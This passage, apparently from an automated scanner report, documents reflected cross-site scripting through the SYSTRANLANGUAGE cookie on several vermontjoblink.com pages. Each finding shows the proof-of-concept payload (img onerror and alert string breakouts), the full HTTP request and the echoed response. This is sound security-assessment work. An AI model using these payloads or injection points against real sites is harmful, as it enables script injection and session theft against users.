PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN49AFA";ALERT(1)//3811D504E1\">
...[SNIP]...

3.237. https://www.vermontjoblink.com/ada/works/contactus.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/contactus.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 990e3"><img%20src%3da%20onerror%3dalert(1)>5f5d51121c was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 990e3"><img src=a onerror=alert(1)>5f5d51121c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/contactus.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en990e3"><img%20src%3da%20onerror%3dalert(1)>5f5d51121c; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:56 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en990e3"><img src=a onerror=alert(1)>5f5d51121c">
...[SNIP]...

3.238. https://www.vermontjoblink.com/ada/works/contactus.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/contactus.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fb25"%3balert(1)//0afab1b910d was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 5fb25";alert(1)//0afab1b910d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/contactus.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en5fb25"%3balert(1)//0afab1b910d; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:05 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN5FB25";ALERT(1)//0AFAB1B910D\">
...[SNIP]...

3.239. https://www.vermontjoblink.com/ada/works/employeroverview.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/employeroverview.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2606f"><img%20src%3da%20onerror%3dalert(1)>ce87d810e71 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2606f"><img src=a onerror=alert(1)>ce87d810e71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/employeroverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en2606f"><img%20src%3da%20onerror%3dalert(1)>ce87d810e71; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:38 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en2606f"><img src=a onerror=alert(1)>ce87d810e71">
...[SNIP]...

3.240. https://www.vermontjoblink.com/ada/works/employeroverview.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/employeroverview.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b6c6"%3balert(1)//2bb717da338 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2b6c6";alert(1)//2bb717da338 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/employeroverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en2b6c6"%3balert(1)//2bb717da338; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:42 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN2B6C6";ALERT(1)//2BB717DA338\">
...[SNIP]...

3.241. https://www.vermontjoblink.com/ada/works/joboverview.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/joboverview.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81040"><img%20src%3da%20onerror%3dalert(1)>b72e0d73415 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 81040"><img src=a onerror=alert(1)>b72e0d73415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/joboverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en81040"><img%20src%3da%20onerror%3dalert(1)>b72e0d73415; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:41 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en81040"><img src=a onerror=alert(1)>b72e0d73415">
...[SNIP]...

3.242. https://www.vermontjoblink.com/ada/works/joboverview.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/joboverview.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f340"%3balert(1)//e611409b0e4 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2f340";alert(1)//e611409b0e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/joboverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en2f340"%3balert(1)//e611409b0e4; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:45 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN2F340";ALERT(1)//E611409B0E4\">
...[SNIP]...

3.243. https://www.vermontjoblink.com/ada/works/jobsearch.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/jobsearch.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a6d8"%3balert(1)//ce7bba5ab0e was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 9a6d8";alert(1)//ce7bba5ab0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/jobsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en9a6d8"%3balert(1)//ce7bba5ab0e; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:40 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN9A6D8";ALERT(1)//CE7BBA5AB0E\">
...[SNIP]...

3.244. https://www.vermontjoblink.com/ada/works/jobsearch.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/jobsearch.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d5b"><img%20src%3da%20onerror%3dalert(1)>18601d5f451 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as d3d5b"><img src=a onerror=alert(1)>18601d5f451 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/works/jobsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=end3d5b"><img%20src%3da%20onerror%3dalert(1)>18601d5f451; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:37 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

